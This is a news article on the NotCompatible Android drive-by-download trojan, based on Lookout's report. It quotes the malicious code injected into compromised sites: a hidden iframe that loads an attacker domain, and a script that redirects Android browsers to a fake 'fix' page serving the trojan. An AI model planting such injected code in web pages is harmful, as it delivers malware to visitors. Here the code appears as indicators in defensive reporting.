

Fandroids are plagued with malware left and right. Their device can get infected from downloading apps in Google Play but especially from unofficial third-party app stores. But the worst part is, drive by download malware is now attacking Android devices.
NotCompatible
Lookout Mobile Security recently identified a drive by download malware dubbed as NotCompatible. Drive by download is common in PCs. When a user visits an infected site, the malware secretly infects the computer if it doesn’t have updated security measures.
NotCompatible works in a similar manner: if someone used his Android device in visiting an infected site, their web browser will automatically download an application and when it finishes downloading, the device displays a notification alerting the user to click on the notification to install the downloaded app. But first, the “Unknown sources” setting should be enabled (this feature is commonly referred to as “sideloading”) or the installation would be blocked.
Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
Lookout identified the following sites serving malicious Android apps:
While Command and Control (C&C) domains include:
Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.
“Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.
“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”
Support our open free content by sharing and engaging with our content and community.
Where Technology Leaders Connect, Share Intelligence & Create Opportunities
SiliconANGLE Media is a recognized leader in digital media innovation serving innovative audiences and brands, bringing together cutting-edge technology, influential content, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — such as those established in Silicon Valley and the New York Stock Exchange (NYSE) — SiliconANGLE Media operates at the intersection of media, technology, and AI. .
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a powerful ecosystem of industry-leading digital media brands, with a reach of 15+ million elite tech professionals. The company’s new, proprietary theCUBE AI Video cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.